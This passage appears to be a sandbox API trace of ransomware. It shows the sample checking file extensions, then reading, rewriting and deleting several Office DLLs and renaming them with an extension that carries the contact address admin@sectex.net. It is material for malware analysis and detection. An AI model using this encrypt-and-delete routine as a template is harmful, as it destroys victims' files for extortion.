	[0058.331] lstrlenW (lpString=".doc") returned 4
	[0058.331] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0058.331] lstrlenW (lpString=".docx") returned 5
	[0058.331] lstrcmpiW (lpString1=".docx", lpString2="E.DLL") returned -1
	[0058.331] lstrlenW (lpString=".pdf") returned 4
	[0058.331] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0058.331] lstrlenW (lpString=".xls") returned 4
	[0058.331] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0058.331] lstrlenW (lpString=".xlsx") returned 5
	[0058.331] lstrcmpiW (lpString1=".xlsx", lpString2="E.DLL") returned -1
	[0058.331] lstrlenW (lpString=".ppt") returned 4
	[0058.331] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0058.331] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACECORE.DLL") returned 67
	[0058.331] lstrlenW (lpString=".zip") returned 4
	[0058.331] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0058.331] lstrlenW (lpString=".rar") returned 4
	[0058.331] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0058.331] lstrlenW (lpString=".bz2") returned 4
	[0058.331] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0058.331] lstrlenW (lpString=".7z") returned 3
	[0058.331] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0058.331] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACECORE.DLL") returned 67
	[0058.331] lstrlenW (lpString=".dbf") returned 4
	[0058.331] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0058.331] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACECORE.DLL") returned 67
	[0058.331] lstrlenW (lpString=".1cd") returned 4
	[0058.331] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0058.331] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACECORE.DLL") returned 67
	[0058.331] lstrlenW (lpString=".jpg") returned 4
	[0058.331] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0058.332] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0058.332] lstrlenW (lpString="ACEODBC.DLL") returned 11
	[0058.332] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODBC.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceodbc.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214
	[0058.332] GetFileSizeEx (in: hFile=0x214, lpFileSize=0xa55ff1c | out: lpFileSize=0xa55ff1c*=342960) returned 1
	[0058.332] CloseHandle (hObject=0x214) returned 1
	[0058.332] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODBC.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceodbc.dll")) returned 0x20
	[0058.332] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODBC.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceodbc.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0058.332] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODBC.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceodbc.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214
	[0058.332] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fec8 | out: lpNewFilePointer=0x0) returned 1
	[0058.333] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fec8 | out: lpNewFilePointer=0x0) returned 1
	[0058.333] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODBC.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceodbc.dll.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188
	[0058.333] GetLastError () returned 0x0
	[0058.333] ReadFile (in: hFile=0x214, lpBuffer=0xb0b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa55fed4, lpOverlapped=0x0 | out: lpBuffer=0xb0b0020*, lpNumberOfBytesRead=0xa55fed4*=0x53bb0, lpOverlapped=0x0) returned 1
	[0058.481] WriteFile (in: hFile=0x188, lpBuffer=0xb0b0020*, nNumberOfBytesToWrite=0x53bc0, lpNumberOfBytesWritten=0xa55fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb0b0020*, lpNumberOfBytesWritten=0xa55fc9c*=0x53bc0, lpOverlapped=0x0) returned 1
	[0058.530] ReadFile (in: hFile=0x214, lpBuffer=0xb0b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa55fed4, lpOverlapped=0x0 | out: lpBuffer=0xb0b0020*, lpNumberOfBytesRead=0xa55fed4*=0x0, lpOverlapped=0x0) returned 1
	[0058.530] WriteFile (in: hFile=0x188, lpBuffer=0xb0b0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0xa55fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb0b0020*, lpNumberOfBytesWritten=0xa55fc9c*=0xea, lpOverlapped=0x0) returned 1
	[0058.530] SetEndOfFile (hFile=0x188) returned 1
	[0058.553] CloseHandle (hObject=0x188) returned 1
	[0058.584] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fec8 | out: lpNewFilePointer=0x0) returned 1
	[0058.584] SetEndOfFile (hFile=0x214) returned 1
	[0058.588] CloseHandle (hObject=0x214) returned 1
	[0058.588] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODBC.DLL.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0058.588] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODBC.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceodbc.dll")) returned 1
	[0058.588] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODBC.DLL") returned 67
	[0058.588] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODBC.DLL") returned 67
	[0058.588] lstrlenW (lpString=".doc") returned 4
	[0058.588] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0058.588] lstrlenW (lpString=".docx") returned 5
	[0058.588] lstrcmpiW (lpString1=".docx", lpString2="C.DLL") returned -1
	[0058.588] lstrlenW (lpString=".pdf") returned 4
	[0058.588] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0058.588] lstrlenW (lpString=".xls") returned 4
	[0058.588] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0058.588] lstrlenW (lpString=".xlsx") returned 5
	[0058.588] lstrcmpiW (lpString1=".xlsx", lpString2="C.DLL") returned -1
	[0058.588] lstrlenW (lpString=".ppt") returned 4
	[0058.588] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0058.588] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODBC.DLL") returned 67
	[0058.588] lstrlenW (lpString=".zip") returned 4
	[0058.588] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0058.589] lstrlenW (lpString=".rar") returned 4
	[0058.589] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0058.589] lstrlenW (lpString=".bz2") returned 4
	[0058.589] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0058.589] lstrlenW (lpString=".7z") returned 3
	[0058.589] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0058.589] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODBC.DLL") returned 67
	[0058.589] lstrlenW (lpString=".dbf") returned 4
	[0058.589] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0058.589] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODBC.DLL") returned 67
	[0058.589] lstrlenW (lpString=".1cd") returned 4
	[0058.589] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0058.589] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODBC.DLL") returned 67
	[0058.589] lstrlenW (lpString=".jpg") returned 4
	[0058.589] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0058.589] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODBC.DLL") returned 67
	[0058.589] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODBC.DLL") returned 67
	[0058.589] lstrlenW (lpString=".doc") returned 4
	[0058.589] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0058.589] lstrlenW (lpString=".docx") returned 5
	[0058.589] lstrcmpiW (lpString1=".docx", lpString2="C.DLL") returned -1
	[0058.589] lstrlenW (lpString=".pdf") returned 4
	[0058.589] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0058.589] lstrlenW (lpString=".xls") returned 4
	[0058.589] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0058.589] lstrlenW (lpString=".xlsx") returned 5
	[0058.589] lstrcmpiW (lpString1=".xlsx", lpString2="C.DLL") returned -1
	[0058.589] lstrlenW (lpString=".ppt") returned 4
	[0058.589] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0058.589] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODBC.DLL") returned 67
	[0058.589] lstrlenW (lpString=".zip") returned 4
	[0058.589] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0058.589] lstrlenW (lpString=".rar") returned 4
	[0058.589] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0058.589] lstrlenW (lpString=".bz2") returned 4
	[0058.590] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0058.590] lstrlenW (lpString=".7z") returned 3
	[0058.590] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0058.590] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODBC.DLL") returned 67
	[0058.590] lstrlenW (lpString=".dbf") returned 4
	[0058.590] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0058.590] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODBC.DLL") returned 67
	[0058.590] lstrlenW (lpString=".1cd") returned 4
	[0058.590] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0058.590] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODBC.DLL") returned 67
	[0058.590] lstrlenW (lpString=".jpg") returned 4
	[0058.590] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0058.590] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0058.590] lstrlenW (lpString="ACER3X.DLL") returned 10
	[0058.590] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACER3X.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acer3x.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214
	[0058.590] GetFileSizeEx (in: hFile=0x214, lpFileSize=0xa55ff1c | out: lpFileSize=0xa55ff1c*=451480) returned 1
	[0058.590] CloseHandle (hObject=0x214) returned 1
	[0058.591] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACER3X.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acer3x.dll")) returned 0x20
	[0058.591] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACER3X.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acer3x.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0058.591] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACER3X.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acer3x.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214
	[0058.591] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fec8 | out: lpNewFilePointer=0x0) returned 1
	[0058.591] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fec8 | out: lpNewFilePointer=0x0) returned 1
	[0058.591] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACER3X.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acer3x.dll.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c
	[0058.591] GetLastError () returned 0x0
	[0058.591] ReadFile (in: hFile=0x214, lpBuffer=0xb0b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa55fed4, lpOverlapped=0x0 | out: lpBuffer=0xb0b0020*, lpNumberOfBytesRead=0xa55fed4*=0x6e398, lpOverlapped=0x0) returned 1
	[0058.602] WriteFile (in: hFile=0x20c, lpBuffer=0xb0b0020*, nNumberOfBytesToWrite=0x6e3a0, lpNumberOfBytesWritten=0xa55fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb0b0020*, lpNumberOfBytesWritten=0xa55fc9c*=0x6e3a0, lpOverlapped=0x0) returned 1
	[0058.610] ReadFile (in: hFile=0x214, lpBuffer=0xb0b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa55fed4, lpOverlapped=0x0 | out: lpBuffer=0xb0b0020*, lpNumberOfBytesRead=0xa55fed4*=0x0, lpOverlapped=0x0) returned 1
	[0058.610] WriteFile (in: hFile=0x20c, lpBuffer=0xb0b0020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0xa55fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb0b0020*, lpNumberOfBytesWritten=0xa55fc9c*=0xe8, lpOverlapped=0x0) returned 1
	[0058.610] SetEndOfFile (hFile=0x20c) returned 1
	[0058.620] CloseHandle (hObject=0x20c) returned 1
	[0058.622] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fec8 | out: lpNewFilePointer=0x0) returned 1
	[0058.647] SetEndOfFile (hFile=0x214) returned 1
	[0058.651] CloseHandle (hObject=0x214) returned 1
	[0058.651] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACER3X.DLL.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0058.651] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACER3X.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acer3x.dll")) returned 1
	[0058.651] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACER3X.DLL") returned 66
	[0058.651] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACER3X.DLL") returned 66
	[0058.651] lstrlenW (lpString=".doc") returned 4
	[0058.651] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0058.651] lstrlenW (lpString=".docx") returned 5
	[0058.651] lstrcmpiW (lpString1=".docx", lpString2="X.DLL") returned -1
	[0058.651] lstrlenW (lpString=".pdf") returned 4
	[0058.651] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0058.651] lstrlenW (lpString=".xls") returned 4
	[0058.651] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0058.651] lstrlenW (lpString=".xlsx") returned 5
	[0058.651] lstrcmpiW (lpString1=".xlsx", lpString2="X.DLL") returned -1
	[0058.651] lstrlenW (lpString=".ppt") returned 4
	[0058.651] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0058.651] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACER3X.DLL") returned 66
	[0058.651] lstrlenW (lpString=".zip") returned 4
	[0058.651] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0058.651] lstrlenW (lpString=".rar") returned 4
	[0058.651] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0058.651] lstrlenW (lpString=".bz2") returned 4
	[0058.652] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0058.652] lstrlenW (lpString=".7z") returned 3
	[0058.652] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0058.652] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACER3X.DLL") returned 66
	[0058.652] lstrlenW (lpString=".dbf") returned 4
	[0058.652] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0058.652] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACER3X.DLL") returned 66
	[0058.652] lstrlenW (lpString=".1cd") returned 4
	[0058.652] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0058.652] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACER3X.DLL") returned 66
	[0058.652] lstrlenW (lpString=".jpg") returned 4
	[0058.652] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0058.652] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACER3X.DLL") returned 66
	[0058.652] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACER3X.DLL") returned 66
	[0058.652] lstrlenW (lpString=".doc") returned 4
	[0058.652] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0058.652] lstrlenW (lpString=".docx") returned 5
	[0058.652] lstrcmpiW (lpString1=".docx", lpString2="X.DLL") returned -1
	[0058.652] lstrlenW (lpString=".pdf") returned 4
	[0058.652] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0058.652] lstrlenW (lpString=".xls") returned 4
	[0058.652] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0058.652] lstrlenW (lpString=".xlsx") returned 5
	[0058.652] lstrcmpiW (lpString1=".xlsx", lpString2="X.DLL") returned -1
	[0058.652] lstrlenW (lpString=".ppt") returned 4
	[0058.652] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0058.652] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACER3X.DLL") returned 66
	[0058.652] lstrlenW (lpString=".zip") returned 4
	[0058.652] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0058.652] lstrlenW (lpString=".rar") returned 4
	[0058.652] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0058.652] lstrlenW (lpString=".bz2") returned 4
	[0058.652] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0058.652] lstrlenW (lpString=".7z") returned 3
	[0058.653] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0058.653] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACER3X.DLL") returned 66
	[0058.653] lstrlenW (lpString=".dbf") returned 4
	[0058.653] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0058.653] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACER3X.DLL") returned 66
	[0058.653] lstrlenW (lpString=".1cd") returned 4
	[0058.653] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0058.653] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACER3X.DLL") returned 66
	[0058.653] lstrlenW (lpString=".jpg") returned 4
	[0058.653] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0058.653] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0058.653] lstrlenW (lpString="ACETXT.DLL") returned 10
	[0058.653] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACETXT.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acetxt.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214
	[0058.653] GetFileSizeEx (in: hFile=0x214, lpFileSize=0xa55ff1c | out: lpFileSize=0xa55ff1c*=297360) returned 1
	[0058.653] CloseHandle (hObject=0x214) returned 1
	[0058.653] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACETXT.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acetxt.dll")) returned 0x20
	[0058.654] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACETXT.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acetxt.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0058.654] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACETXT.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acetxt.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214
	[0058.654] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fec8 | out: lpNewFilePointer=0x0) returned 1
	[0058.654] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fec8 | out: lpNewFilePointer=0x0) returned 1
	[0058.654] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACETXT.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acetxt.dll.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c
	[0058.654] GetLastError () returned 0x0
	[0058.654] ReadFile (in: hFile=0x214, lpBuffer=0xb0b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa55fed4, lpOverlapped=0x0 | out: lpBuffer=0xb0b0020*, lpNumberOfBytesRead=0xa55fed4*=0x48990, lpOverlapped=0x0) returned 1
	[0058.660] WriteFile (in: hFile=0x20c, lpBuffer=0xb0b0020*, nNumberOfBytesToWrite=0x489a0, lpNumberOfBytesWritten=0xa55fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb0b0020*, lpNumberOfBytesWritten=0xa55fc9c*=0x489a0, lpOverlapped=0x0) returned 1
	[0058.666] ReadFile (in: hFile=0x214, lpBuffer=0xb0b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa55fed4, lpOverlapped=0x0 | out: lpBuffer=0xb0b0020*, lpNumberOfBytesRead=0xa55fed4*=0x0, lpOverlapped=0x0) returned 1
	[0058.666] WriteFile (in: hFile=0x20c, lpBuffer=0xb0b0020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0xa55fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb0b0020*, lpNumberOfBytesWritten=0xa55fc9c*=0xe8, lpOverlapped=0x0) returned 1
	[0058.666] SetEndOfFile (hFile=0x20c) returned 1
	[0058.666] CloseHandle (hObject=0x20c) returned 1
	[0058.666] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fec8 | out: lpNewFilePointer=0x0) returned 1
	[0058.666] SetEndOfFile (hFile=0x214) returned 1
	[0058.669] CloseHandle (hObject=0x214) returned 1
	[0058.669] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACETXT.DLL.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0058.669] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACETXT.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acetxt.dll")) returned 1
	[0058.669] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACETXT.DLL") returned 66
	[0058.669] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACETXT.DLL") returned 66
	[0058.670] lstrlenW (lpString=".doc") returned 4
	[0058.670] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0058.670] lstrlenW (lpString=".docx") returned 5
	[0058.670] lstrcmpiW (lpString1=".docx", lpString2="T.DLL") returned -1
	[0058.670] lstrlenW (lpString=".pdf") returned 4
	[0058.670] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0058.670] lstrlenW (lpString=".xls") returned 4
	[0058.670] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0058.670] lstrlenW (lpString=".xlsx") returned 5
	[0058.670] lstrcmpiW (lpString1=".xlsx", lpString2="T.DLL") returned -1
	[0058.670] lstrlenW (lpString=".ppt") returned 4
	[0058.670] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0058.670] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACETXT.DLL") returned 66
	[0058.670] lstrlenW (lpString=".zip") returned 4
	[0058.670] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0058.670] lstrlenW (lpString=".rar") returned 4
	[0058.670] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0058.670] lstrlenW (lpString=".bz2") returned 4
	[0058.670] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0058.670] lstrlenW (lpString=".7z") returned 3
	[0058.670] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0058.670] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACETXT.DLL") returned 66
	[0058.670] lstrlenW (lpString=".dbf") returned 4
	[0058.670] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0058.670] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACETXT.DLL") returned 66
	[0058.670] lstrlenW (lpString=".1cd") returned 4
	[0058.670] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0058.670] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACETXT.DLL") returned 66
	[0058.670] lstrlenW (lpString=".jpg") returned 4
	[0058.670] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0058.670] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACETXT.DLL") returned 66
	[0058.670] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACETXT.DLL") returned 66
	[0058.670] lstrlenW (lpString=".doc") returned 4
	[0058.670] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0058.670] lstrlenW (lpString=".docx") returned 5
	[0058.671] lstrcmpiW (lpString1=".docx", lpString2="T.DLL") returned -1
	[0058.671] lstrlenW (lpString=".pdf") returned 4
	[0058.671] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0058.671] lstrlenW (lpString=".xls") returned 4
